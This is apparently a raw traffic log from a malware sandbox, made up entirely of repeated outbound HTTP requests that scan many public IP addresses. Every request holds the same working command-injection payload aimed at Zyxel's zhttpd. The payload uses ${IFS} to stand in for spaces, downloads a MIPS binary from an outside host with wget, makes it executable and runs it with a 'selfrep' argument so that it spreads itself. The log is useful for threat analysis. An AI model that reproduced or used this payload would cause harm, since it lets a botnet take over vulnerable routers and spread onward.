                                                Jan 12, 2024 18:16:08.114571095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                739192.168.2.2350796137.161.99.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.114634037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                740192.168.2.235451295.200.200.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.114700079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                741192.168.2.2359684197.172.168.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.114761114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                742192.168.2.2353384158.106.169.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.114792109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                743192.168.2.2332922120.54.96.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.114845037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                744192.168.2.2343606194.92.149.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.114919901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                745192.168.2.233763246.175.202.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.114974976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                746192.168.2.2355014115.78.131.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.115025997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                747192.168.2.2357288132.243.178.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.115067005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                748192.168.2.2345086145.80.135.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.115108013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                749192.168.2.233351064.55.114.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.115156889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                750192.168.2.234007880.46.207.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.115216970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                751192.168.2.2338604194.68.222.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.115252972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                752192.168.2.236062096.149.18.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.115315914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                753192.168.2.2357296125.136.230.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.115367889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                754192.168.2.2351894167.155.38.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.115407944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                755192.168.2.2341948114.178.47.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.115462065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                756192.168.2.233512092.8.71.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.115537882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                757192.168.2.235350225.41.39.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.115561962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                758192.168.2.2339656177.220.68.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.115648985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                759192.168.2.2352956138.209.122.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.115678072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                760192.168.2.2338608147.149.65.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.115746021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                761192.168.2.2344288182.230.140.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.115799904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                762192.168.2.2356962108.87.23.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.115827084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                763192.168.2.2352572156.31.34.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.115911007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                764192.168.2.234447038.71.103.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.115978003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                765192.168.2.233814448.83.27.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.116034985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                766192.168.2.2358854221.213.105.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.116077900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                767192.168.2.234993618.196.82.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.116115093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                768192.168.2.236096094.85.131.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.116178036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                769192.168.2.2358392213.245.124.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.116210938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                770192.168.2.2352084222.176.64.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.116291046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                771192.168.2.2349336178.134.95.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.116344929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                772192.168.2.233691283.90.66.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.116424084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                773192.168.2.235272296.150.58.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.116482019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                774192.168.2.235654632.14.177.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.116544008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                775192.168.2.2340662203.12.32.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.116576910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                776192.168.2.2360940194.213.246.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.116631031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                777192.168.2.235054851.55.68.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.116672039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                778192.168.2.235135665.42.87.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.116723061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                779192.168.2.2334778222.76.177.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.116786003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                780192.168.2.2350576136.169.137.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.116852999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                781192.168.2.233711438.152.215.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.116880894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                782192.168.2.235253418.224.152.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.116919994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                783192.168.2.2359532186.119.214.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.116961956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                784192.168.2.233551876.52.114.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.117167950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                785192.168.2.235213676.254.0.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.117229939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                786192.168.2.2335286161.68.108.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.117288113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                787192.168.2.233308293.252.76.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.117341995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                788192.168.2.235005245.252.105.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.117394924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                789192.168.2.234255067.155.34.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.117429018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                790192.168.2.2346434194.170.235.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.117475033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                791192.168.2.2350254219.40.227.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.117527962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                792192.168.2.236085454.110.223.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.117569923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                793192.168.2.2338508167.197.209.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.117659092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                794192.168.2.2340118139.157.73.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.117711067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                795192.168.2.2356134191.123.153.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.117757082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                796192.168.2.2358414189.233.127.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.117811918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                797192.168.2.2356728124.163.222.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.117844105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                798192.168.2.235437068.168.127.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.117918015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                799192.168.2.234406017.96.241.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.117980003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                800192.168.2.2334784212.224.124.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.118031025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                801192.168.2.2345372208.163.6.122443
                                                TimestampBytes transferredDirectionData
